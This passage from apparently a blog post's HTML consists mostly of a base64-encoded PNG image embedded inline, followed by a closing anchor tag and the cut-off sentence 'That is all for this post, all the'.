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" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a>That is all for this post, all the 